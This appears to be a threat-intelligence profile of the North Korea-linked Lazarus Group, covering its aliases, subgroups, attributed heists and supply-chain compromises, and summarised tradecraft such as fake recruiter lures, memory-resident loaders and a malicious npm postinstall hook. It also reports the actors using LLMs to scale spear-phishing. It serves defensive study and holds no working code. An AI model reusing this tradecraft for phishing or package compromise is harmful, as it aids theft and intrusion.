Lazarus

Lazarus Group is a North Korea-linked, state-sponsored threat actor, also referred to in the provided content as Hidden Cobra, Guardians of Peace, Labyrinth Chollima, Stardust Chollima, Diamond Sleet, Zinc, UNC1069, UNC1720, Storm-0139, Storm-0954, Storm-1222, Copernicium, Nickel Academy, Nickel Gladstone, Black Artemis, and Lazarus APT/Lazarus APT Group/Lazarus Group. The content also describes financially motivated subgroups or affiliates under the Lazarus umbrella, including BlueNoroff, also called Sapphire Sleet, and references Stardust Chollima/Bluenoroff/APT38 in relation to financial operations. Based on the provided content, Lazarus has conducted both espionage and financially motivated operations, with repeated targeting of financial institutions, cryptocurrency organizations, software supply chains, and South Korean entities. Reported activity linked to Lazarus in the content includes the Sony Pictures Entertainment intrusion, the Bangladesh Central Bank SWIFT theft, attempted bank intrusions using Ratabanka, and evidence tying the group to WannaCry. The content also states that Lazarus was attributed in the KelpDAO LayerZero bridge attack affecting Aave, and that on February 24, 2025 Lazarus allegedly compromised an offline Ethereum wallet associated with ByBit and stole $1.5 billion in digital assets. The group’s tradecraft in the provided material includes social engineering and impersonation, especially recruiter-themed lures. During Operation Dream Job, Lazarus impersonated HR hiring personnel through LinkedIn messages and fake interviews to trick victims into downloading malware. A simulation based on a December 2018 Chilean interbank intrusion attributed to Stardust Chollima describes fake job recruitment via LinkedIn and Skype, a malicious .NET dropper disguised as a job application, execution of a Base64-encoded PowerShell payload, HTTPS command-and-control, and persistence via Registry Run keys and service creation. The content also describes Lazarus-linked malware and techniques focused on stealth and evasion. One reported Lazarus subgroup targeting financial institutions and cryptocurrency organizations used an almost entirely memory-resident framework composed of DPAPILoader, RemotePELoader, and RemotePE. This framework used Windows DPAPI for environmental keying, retrieved payloads from attacker-controlled infrastructure, and provided in-memory remote access capabilities including command execution, file manipulation, process management, and data access while reducing forensic visibility. The content further notes documented Lazarus use of ATT&CK T1036.003, renaming system utilities for masquerading and defense evasion. The Lazarus umbrella is also linked in the content to software supply-chain activity. Microsoft attributed the June 2026 Mastra npm compromise to BlueNoroff/Sapphire Sleet, described as an affiliate of Lazarus Group. In that incident, attackers compromised an npm maintainer account, published malicious versions of more than 140 Mastra-related packages, inserted a typosquatted dependency named easy-day-js, and used a postinstall hook to disable TLS verification, contact command-and-control infrastructure, and deploy a Node.js backdoor that stole credentials, browser data, and cryptocurrency wallet information, with additional PowerShell payloads delivered in some cases. The content also notes tradecraft overlap between this activity and an earlier Axios npm compromise attributed by Microsoft to Sapphire Sleet and by Google Threat Intelligence Group to UNC1069. The provided material additionally states that actors working under the Lazarus umbrella used LLMs to accelerate spear-phishing operations in early 2024, particularly to scale social engineering rather than autonomously develop malware.